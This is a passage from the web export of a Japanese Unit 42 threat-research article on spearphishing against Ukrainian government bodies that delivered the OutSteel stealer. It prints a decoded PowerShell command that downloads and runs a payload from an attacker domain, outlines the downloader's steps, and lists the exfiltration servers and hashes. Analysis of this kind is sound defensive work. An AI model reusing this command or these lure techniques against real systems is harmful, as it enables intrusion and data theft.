id=\"june-2021-attacks\"><\/a>2021\u5e746\u6708\u306e\u653b\u6483<\/h3>\n<p>2021\u5e746\u6708\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u5225\u306e\u30a6\u30af\u30e9\u30a4\u30ca\u653f\u5e9c\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u8a9e\u3067\u300c\u3042\u306a\u305f\u306e\u902e\u6355\u72b6\u300d\u3068\u3044\u3046\u4ef6\u540d\u306e\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u56f327\u306b\u793a\u3059\u3053\u306e\u30e1\u30fc\u30eb\u306e\u5185\u5bb9\u306f\u3001\u300e\u6dfb\u4ed8\u3055\u308c\u305f\u5831\u544a\u66f8\u3092\u8aad\u307e\u306a\u3051\u308c\u3070\u53d7\u4fe1\u8005\u306f\u6307\u540d\u624b\u914d\u3055\u308c\u308b\u300f\u3068\u7dca\u8feb\u3057\u305f\u8a00\u8449\u3065\u304b\u3044\u3067\u5302\u308f\u305b\u308b\u3082\u306e\u3067\u3059\u3002\u3053\u306e\u6cd5\u57f7\u884c\u6a5f\u95a2\u95a2\u9023\u306e\u30c6\u30fc\u30de\u306f\u30012022\u5e742\u67081\u65e5\u306b\u767a\u751f\u3057\u305f\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u4e00\u74b0\u3068\u3057\u3066\u3001\u8b66\u5bdf\u306e\u5831\u544a\u66f8\u3092\u601d\u308f\u305b\u308b\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u4f7f\u7528\u3057\u305f\u653b\u6483\u3068\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122129\" aria-describedby=\"caption-attachment-122129\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122130 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-51.png\" alt=\"2021\u5e746\u6708\u306b\u30a6\u30af\u30e9\u30a4\u30ca\u653f\u5e9c\u6a5f\u95a2\u3078\u9001\u4fe1\u3055\u308c\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\" width=\"900\" height=\"587\" \/><figcaption id=\"caption-attachment-122129\" class=\"wp-caption-text\">\u56f327. 2021\u5e746\u6708\u306b\u30a6\u30af\u30e9\u30a4\u30ca\u653f\u5e9c\u6a5f\u95a2\u3078\u9001\u4fe1\u3055\u308c\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb<\/figcaption><\/figure>\n<p>\u305f\u3060\u3057\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u306f\u30e1\u30fc\u30eb\u672c\u6587\u3067\u5302\u308f\u305b\u305f\u3088\u3046\u306a\u5831\u544a\u66f8\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u6dfb\u4ed8\u3055\u308c\u305f\u300c <span style=\"font-family: 'courier new', courier, monospace;\">\u0417\u0430\u044f\u0432\u0430 \u2116487223-31.doc (880m5) .js<\/span> \u300d\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u30b5\u30a4\u30ba\u304c1,029,786\u30d0\u30a4\u30c8\u306e JavaScript \u30d5\u30a1\u30a4\u30eb\u3067\u3059(\u3053\u306e\u30a2\u30af\u30bf\u30fc\u306f JavaScript \u30b3\u30fc\u30c9\u306e\u5404\u6587\u5b57\u9593\u306b\u591a\u6570\u30b9\u30da\u30fc\u30b9\u3092\u8ffd\u52a0\u3057\u3066\u3044\u307e\u3059)\u3002\u53d7\u4fe1\u8005\u304c\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u3092\u958b\u304f\u3068\u4ee5\u4e0b\u306eJavaScript\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122131\" aria-describedby=\"caption-attachment-122131\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122132 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-1.jpeg\" alt=\"\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u306b\u542b\u307e\u308c\u308b\u4e0d\u6b63JavaScript\" width=\"900\" height=\"176\" \/><figcaption id=\"caption-attachment-122131\" class=\"wp-caption-text\">\u56f328. \u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u306b\u542b\u307e\u308c\u308b\u4e0d\u6b63JavaScript<\/figcaption><\/figure>\n<p>\u4e0a\u8a18\u306eJavaScript\u306f\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305fPowerShell\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u3053\u308c\u3092\u5fa9\u53f7\u3059\u308b\u3068\u4ee5\u4e0b\u306e\u5185\u5bb9\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">invOKe-WeBREqUEST -urI hxxp:\/\/150520212[.]space\/000.cpl -oUtFILE $ENv:PuBLiC\\000.cpl; &amp; $eNV:PUBlIc\\000.cpl<\/span><\/p>\n<p>\u3053\u306ePowerShell\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001<span style=\"font-family: 'courier new', courier, monospace;\">150520212[.]space<\/span>\u304b\u3089\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30d1\u30cd\u30eb\u30d5\u30a1\u30a4\u30eb(CPL)\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3057\u3001\u305d\u308c\u3092<span style=\"font-family: 'courier new', courier, monospace;\">000.cpl<\/span>(SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">b72188ba545ad865eb34954afbbdf2c9e8ebc465a87c5122cebb711f41005939<\/span>)\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u540d\u3067\u4fdd\u5b58\u3057\u307e\u3059\u3002<span style=\"font-family: 'courier new', courier, monospace;\">000.cpl<\/span>\u306fDLL\u3067\u3001\u305d\u306e\u30d5\u30a1\u30f3\u30af\u30b7\u30e7\u30f3\u30b3\u30fc\u30c9\u306f\u30a8\u30af\u30b9\u30dd\u30fc\u30c8\u3055\u308c\u305f\u95a2\u6570<span style=\"font-family: 'courier new', courier, monospace;\">CPlApplet<\/span>\u5185\u306b\u5b58\u5728\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30f3\u30af\u30b7\u30e7\u30f3\u30b3\u30fc\u30c9\u306f\u3001\u30b3\u30fc\u30c9\u3092\u89e3\u6790\u3055\u308c\u306b\u304f\u3044\u3088\u3046\u3001\u3044\u304f\u3064\u304b\u9023\u7d9a\u3059\u308b\u30b8\u30e3\u30f3\u30d7\u3092\u4f7f\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u3046\u3057\u305f\u30b8\u30e3\u30f3\u30d7\u3053\u305d\u3042\u308b\u3082\u306e\u306e\u3001\u30d5\u30a1\u30f3\u30af\u30b7\u30e7\u30f3\u30b3\u30fc\u30c9\u306f\u5fa9\u53f7\u30b9\u30bf\u30d6\u304b\u3089\u59cb\u307e\u308a\u3001<span style=\"font-family: 'courier new', courier, monospace;\">0x29050D91<\/span>\u304b\u3089\u59cb\u307e\u308b\u30ad\u30fc\u3092\u4f7f\u3063\u3066\u6697\u53f7\u6587\u306e\u5404QWORD\u3092XOR\u3057\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u5fa9\u53f7\u30eb\u30fc\u30d7\u306e\u5404\u30a4\u30c6\u30ec\u30fc\u30b7\u30e7\u30f3\u3067\u3053\u306e\u30ad\u30fc\u306f\u81ea\u8eab\u306b<span style=\"font-family: 'courier new', courier, monospace;\">0x749507B5<\/span>\u3092\u4e57\u7b97\u3057\u3066<span style=\"font-family: 'courier new', courier, monospace;\">0x29050D91<\/span>\u3092\u52a0\u7b97\u3059\u308b\u3053\u3068\u3067\u5909\u66f4\u3055\u308c\u307e\u3059\u3002<\/p>\n<p>\u5fa9\u53f7\u30b9\u30bf\u30d6\u304c\u7d42\u4e86\u3059\u308b\u3068\u5fa9\u53f7\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u30d9\u30fc\u30b9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u3067\u3001\u4ee5\u4e0b\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p>1. <span style=\"font-family: 'courier new', courier, monospace;\">LoadLibraryW\u3092\u4f7f\u3063\u3066<span style=\"font-family: 'courier new', courier, monospace;\">kernel32<\/span>\u3092\u30ed\u30fc\u30c9\u3059\u308b<br \/>\n<\/span>2. <span style=\"font-family: 'courier new', courier, monospace;\">GetProcAddress\u3067<span style=\"font-family: 'courier new', courier, monospace;\">ExpandEnvironmentStringsW<\/span> \u306e\u30a2\u30c9\u30ec\u30b9\u3092\u53d6\u5f97\u3059\u308b<br \/>\n<\/span>3. <span style=\"font-family: 'courier new', courier, monospace;\">ExpandEnvironmentStringsA<\/span>\u3092\u547c\u3073\u51fa\u3057\u3066\u30d1\u30b9<span style=\"font-family: 'courier new', courier, monospace;\">%PUBLIC%5653YQ5T3.exe\u306e\u74b0\u5883\u6587\u5b57\u5217\u3092\u5c55\u958b\u3059\u308b<br \/>\n<\/span>4. <span style=\"font-family: 'courier new', courier, monospace;\">CreateFileW\u3092\u4f7f\u3063\u3066<span style=\"font-family: 'courier new', courier, monospace;\">%PUBLIC%\\5653YQ5T3.exe<\/span>\u30d5\u30a1\u30a4\u30eb\u3092\u958b\u304f<br \/>\n<\/span>5. <span style=\"font-family: 'courier new', courier, monospace;\">LoadLibraryA\u3092\u4f7f\u3063\u3066<span style=\"font-family: 'courier new', courier, monospace;\">WinHttp<\/span>\u3092\u30ed\u30fc\u30c9\u3059\u308b<br \/>\n<\/span>6. <span style=\"font-family: 'courier new', courier, monospace;\">WinHttpOpen\u3092\u547c\u3073\u51fa\u3057\u3066HTTP\u30bb\u30c3\u30b7\u30e7\u30f3\u3092\u958b\u304f<br \/>\n<\/span>7. <span style=\"font-family: 'courier new', courier, monospace;\">WinHttpConnect\u3092\u547c\u3073\u51fa\u3057\u30dd\u30fc\u30c880\/tcp\u3067\u30ea\u30e2\u30fc\u30c8\u30b5\u30fc\u30d0\u30fc<span style=\"font-family: 'courier new', courier, monospace;\">150520212[.]space\u306b<\/span>\u63a5\u7d9a\u3059\u308b<br \/>\n<\/span>8. <span style=\"font-family: 'courier new', courier, monospace;\">WinHttpOpenRequest\u3092\u4f7f\u3063\u3066<span style=\"font-family: 'courier new', courier, monospace;\">\/0404.exe<\/span>\u306b\u5bfe\u3059\u308b HTTP GET \u30ea\u30af\u30a8\u30b9\u30c8\u3092\u4f5c\u6210\u3059\u308b<br \/>\n<\/span>9. <span style=\"font-family: 'courier new', courier, monospace;\">WinHttpSendRequest\u7d4c\u7531\u3067\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u9001\u4fe1\u3059\u308b<br \/>\n<\/span>10. <span style=\"font-family: 'courier new', courier, monospace;\">WinHttpReceiveResponse<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">WinHttpQueryDataAvailable<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">WinHttpReadData<\/span>\u3092\u547c\u3073\u51fa\u3057\u3066HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u30c7\u30fc\u30bf\u3092\u53d6\u5f97\u3059\u308b<br \/>\n11. <span style=\"font-family: 'courier new', courier, monospace;\">WriteFile\u3092\u547c\u3073\u51fa\u3057\u3066<span style=\"font-family: 'courier new', courier, monospace;\">%PUBLIC%\\5653YQ5T3.exe<\/span> \u306b\u5fdc\u7b54\u30c7\u30fc\u30bf\u3092\u66f8\u304d\u8fbc\u3080<br \/>\n<\/span>12. <span style=\"font-family: 'courier new', courier, monospace;\">CloseHandle\u3092\u547c\u3073\u51fa\u3057\u3066<span style=\"font-family: 'courier new', courier, monospace;\">%PUBLIC%\\5653YQ5T3.exe<\/span> \u3078\u306e\u30cf\u30f3\u30c9\u30eb\u3092\u30af\u30ed\u30fc\u30ba\u3059\u308b<br \/>\n<\/span>13. <span style=\"font-family: 'courier new', courier, monospace;\">ShellExecuteW\u3092\u547c\u3073\u51fa\u3057\u3066<span style=\"font-family: 'courier new', courier, monospace;\">%PUBLIC%\\5653YQ5T3.exe<\/span>\u3092\u5b9f\u884c\u3059\u308b<br \/>\n<\/span>14. <span style=\"font-family: 'courier new', courier, monospace;\">ExitProcess<\/span>\u3092\u547c\u3073\u51fa\u3057\u3066\u7d42\u4e86\u3059\u308b<\/p>\n<p>150520212[.]space\/0404.exe (SHA256: cb4a93864a19fc14c1e5221912f8e7f409b5b8d835f1b3acc3712b80e4a909f1) \u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u308b\u30d5\u30a1\u30a4\u30eb\u306f http:\/\/45[.]146.164.37\/upld\/ \u3078\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u53ce\u96c6\u30fb\u6f0f\u51fa\u3092\u884c\u3046OutSteel\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002<\/p>\n<h3><a id=\"july-2021-targeting\"><\/a>2021\u5e747\u6708\u306e\u6a19\u7684<\/h3>\n<p>2021\u5e747\u670822\u65e5\u3001\u79c1\u305f\u3061\u306f\u3001\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u3088\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u306e\u8a66\u307f\u304c\u5728\u30a6\u30af\u30e9\u30a4\u30ca\u6b27\u7c73\u653f\u5e9c\u6a5f\u95a2\u3092\u6a19\u7684\u3068\u3057\u3066\u884c\u308f\u308c\u305f\u3053\u3068\u3092\u78ba\u8a8d\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u30a2\u30af\u30bf\u30fc\u306f\u3001\u5927\u4f7f\u9928\u306e\u30a6\u30a7\u30d6\u30b5\u30a4\u30c8\u306b\u516c\u793a\u3055\u308c\u3066\u3044\u308b\u30a2\u30c9\u30ec\u30b9\u306b<span style=\"font-family: 'courier new', courier, monospace;\">RE: CV<\/span>\u3068\u3044\u3046\u4ef6\u540d\u3067\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u30e1\u30fc\u30eb\u306b\u306fWord\u6587\u66f8\u304c\u6dfb\u4ed8\u3055\u308c\u3066\u304a\u308a\u3001\u305d\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u306f<span style=\"font-family: 'courier new', courier, monospace;\">&lt;first name&gt;_&lt;last name&gt;_CV.doc<\/span>\u3068\u3044\u3046\u69cb\u6210\u306b\u306a\u3063\u3066\u3044\u307e\u3057\u305f\u3002&lt;first name&gt; \u3068 &lt;last name&gt; \u306b\u5165\u308b\u540d\u524d\u306f\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u3042\u308b\u8457\u540d\u30b8\u30e3\u30fc\u30ca\u30ea\u30b9\u30c8\u306e\u3082\u306e\u3067\u3057\u305f\u3002\u56f329\u306f\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u8a9e\u7248Windows\u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u74b0\u5883\u306a\u3089\u3070\u3053\u306e\u3088\u3046\u306b\u8868\u793a\u3055\u308c\u308b\u3067\u3042\u308d\u3046\u3068\u3044\u3046\u6dfb\u4ed8\u6587\u66f8\u306e\u5185\u5bb9\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_122133\" aria-describedby=\"caption-attachment-122133\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122134 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-52.png\" alt=\"2021\u5e747\u6708\u306b\u30ad\u30fc\u30a6\u306e\u3042\u308b\u5927\u4f7f\u9928\u3078\u306e\u653b\u6483\u306b\u4f7f\u7528\u3055\u308c\u305f\u914d\u5e03\u6587\u66f8\u306e\u5185\u5bb9\" width=\"900\" height=\"724\" \/><figcaption id=\"caption-attachment-122133\" class=\"wp-caption-text\">\u56f329. 2021\u5e747\u6708\u306b\u30ad\u30fc\u30a6\u306e\u3042\u308b\u5927\u4f7f\u9928\u3078\u306e\u653b\u6483\u306b\u4f7f\u7528\u3055\u308c\u305f\u914d\u5e03\u6587\u66f8\u306e\u5185\u5bb9<\/figcaption><\/figure>\n<p>\u6587\u66f8\u306e\u5185\u5bb9\u306f\u5f53\u8a72\u30b8\u30e3\u30fc\u30ca\u30ea\u30b9\u30c8\u306e\u5c65\u6b74\u66f8\u3092\u60f3\u8d77\u3055\u305b\u308b\u4f53\u88c1\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u6587\u5b57\u5316\u3051\u304c\u898b\u3089\u308c\u308b\u3053\u3068\u304b\u3089\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u8a9e\u7248Windows\u3067\u306f\u8868\u793a\u3067\u304d\u306a\u3044\u3088\u3046\u306a\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306e\u554f\u984c\u304c\u3042\u308b\u3068\u601d\u308f\u308c\u307e\u3059\u3002\u753b\u50cf\u306f\u8907\u6570\u306e\u30b5\u30a4\u30c8\u3067\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u30b9\u30c8\u30c3\u30af\u30d5\u30a9\u30c8[<a href=\"https:\/\/www.shutterstock.com\/image-photo\/work-confidence-waist-portrait-smiling-woman-1284691177\">1<\/a>][<a href=\"https:\/\/stock.adobe.com\/images\/One-female-specialists-staying-on-work-office\/243123332\">2<\/a>][<a href=\"https:\/\/www.apimages.com\/metadata\/MSIndex\/One-female-specialists-staying-on-work-office\/243123332\/517\">3<\/a>]\u3067\u3001\u305d\u306e\u30b8\u30e3\u30fc\u30ca\u30ea\u30b9\u30c8\u306e\u5b9f\u969b\u306e\u5199\u771f\u3067\u306f\u306a\u3044\u3088\u3046\u3067\u3059\u3002\u3053\u306e\u6587\u5b57\u5316\u3051\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u3092\u9a19\u3057\u3066[Enable Editing (\u7de8\u96c6\u3092\u6709\u52b9\u306b\u3059\u308b)]\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3055\u305b\u3001\u6700\u7d42\u7684\u306b\u6587\u66f8\u306b\u57cb\u3081\u8fbc\u307e\u308c\u305f\u30de\u30af\u30ed\u3092\u5b9f\u884c\u3055\u305b\u3088\u3046\u3068\u3059\u308b\u610f\u56f3\u7684\u306a\u3082\u306e\u3068\u601d\u308f\u308c\u307e\u3059\u3002\u30e6\u30fc\u30b6\u30fc\u304c[Enable Editing]\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u305f\u5834\u5408\u306b\u5b9f\u884c\u3055\u308c\u308b\u30de\u30af\u30ed(\u56f330\u53c2\u7167)\u306f<span style=\"font-family: 'courier new', courier, monospace;\">meancell.bat<\/span>\u3068\u3044\u3046\u30d0\u30c3\u30c1\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u3053\u306e\u30d0\u30c3\u30c1\u30b9\u30af\u30ea\u30d7\u30c8\u304cPowerShell\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">Start-BitsTransfer<\/span>\u30b3\u30de\u30f3\u30c9\u30ec\u30c3\u30c8\u306b\u3088\u3063\u3066<span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/1833[.] site\/kpd1974.exe<\/span>\u304b\u3089\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f<span style=\"font-family: 'courier new', courier, monospace;\">everylisten.exe<\/span>\u3068\u3057\u3066\u4fdd\u5b58\u30fb\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u56f3 30 \u306f\u3001\u3053\u306e\u914d\u5e03\u6587\u66f8\u5185\u306b\u3042\u308b\u30de\u30af\u30ed\u306e\u5185\u5bb9\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_122135\" aria-describedby=\"caption-attachment-122135\" style=\"width: 709px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122136 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-53.png\" alt=\"\u914d\u5e03\u6587\u66f8\u5185\u306b\u3042\u308b\u30de\u30af\u30ed\u306e\u5185\u5bb9\" width=\"709\" height=\"177\" \/><figcaption id=\"caption-attachment-122135\" class=\"wp-caption-text\">\u56f330. \u914d\u5e03\u6587\u66f8\u5185\u306b\u3042\u308b\u30de\u30af\u30ed\u306e\u5185\u5bb9<\/figcaption><\/figure>\n<p>\u30de\u30af\u30ed\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30fb\u5b9f\u884c\u3057\u305f<span style=\"font-family: 'courier new', courier, monospace;\">kpd1974.exe<\/span>\u30d5\u30a1\u30a4\u30eb (SHA256:<span style=\"font-family: 'courier new', courier, monospace;\">b8ce958f56087c6cd55fa2131a1cd3256063e7c73adf36af313054b0f17b7b43<\/span>) \u306f\u3001\u6700\u7d42\u7684\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u3092<span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/45.146.165[.]91:8080\/upld\/<\/span>\u306b\u6f0f\u51fa\u3055\u305b\u308bOutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u30c4\u30fc\u30eb\u306e\u4e9c\u7a2e\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u88685\u306b\u793a\u3057\u305f\u3088\u3046\u306b\u3001\u985e\u4f3c\u3059\u308b\u30de\u30af\u30ed\u3092\u5171\u6709\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">1833[.]site<\/span>\u306b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30db\u30b9\u30c8\u3057\u3066\u3044\u308b\u8ffd\u52a0\u306e\u914d\u5e03\u6587\u66f8\u304c2\u3064\u898b\u3064\u304b\u308a\u307e\u3057\u305f\u3002\u3053\u306e2\u3064\u306e\u95a2\u9023\u6587\u66f8\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u306e1\u3064\u306f\u3001\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u507d\u306e\u5c65\u6b74\u66f8\u3092\u30c6\u30fc\u30de\u306b\u4f7f\u3044\u7d9a\u3051\u3066\u3044\u305f\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<table style=\"width: 98.6285%;\">\n<tbody>\n<tr>\n<td style=\"width: 17.0974%;\"><b>\u521d\u8a8d<\/b><\/td>\n<td style=\"width: 34.5924%;\"><b>\u30d5\u30a1\u30a4\u30eb\u540d<\/b><\/td>\n<td style=\"width: 224.254%;\"><b>\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9URL<\/b><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 17.0974%;\"><span style=\"font-weight: 400;\">7\/23\/2021<\/span><\/td>\n<td style=\"width: 34.5924%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">\u0414\u043e\u0432i\u0434\u043a\u0430 (22-7-2021).doc<\/span><\/td>\n<td style=\"width: 224.254%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/1833[.]site\/gp00973.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 17.0974%;\"><span style=\"font-weight: 400;\">7\/23\/2021<\/span><\/td>\n<td style=\"width: 34.5924%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">CV_RUSLANA.doc<\/span><\/td>\n<td style=\"width: 224.254%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/1833[.]site\/rsm1975.exe<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"color: #999999;\"><sup>\u88685 7\u6708\u306e\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305f\u95a2\u9023\u914d\u5e03\u6587\u66f8<\/sup><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 2022\u5e742\u67081\u65e5\u3001Unit 42\u306f\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u3042\u308b\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u305f\u653b\u6483\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002CERT-UA\u306f\u3001\u3053\u306e\u653b\u6483\u304cUAC-0056\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3066\u3044\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u3088\u308b\u3082\u306e\u3067\u3042\u308b\u3068\u516c\u5f0f\u306b\u30a2\u30c8\u30ea\u30d3\u30e5\u30fc<\/p>\n","protected":false},"author":23,"featured_media":134280,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4321,1974,4428],"tags":[5409,5759,4519,5760,4591],"product_categories":[4443,4340,4444],"coauthors":[1025],"class_list":["post-122148","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research","category-malware-ja","category-threat-research-ja","tag-information-disclosure-ja","tag-outsteel-ja","tag-phishing-ja","tag-saintbot","tag-ukraine-ja","product_categories-advanced-url-filtering-ja","product_categories-advanced-wildfire","product_categories-advanced-wildfire-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot<\/title>\n<meta name=\"description\" content=\"2\u6708\u4e0a\u65ec\u3001\u5728\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3059\u308b\u653b\u6483\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u653b\u6483\u306b\u306f OutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306e\u307b\u304b\u3001SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u304c\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f\u3088\u308a\u5927\u898f\u6a21\u306a\u653b\u6483\u306e\u4e00\u74b0\u3068\u3057\u3066\u884c\u308f\u308c\u305f\u3082\u306e\u3067\u3059\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot\" \/>\n<meta property=\"og:description\" content=\"2\u6708\u4e0a\u65ec\u3001\u5728\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3059\u308b\u653b\u6483\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u653b\u6483\u306b\u306f 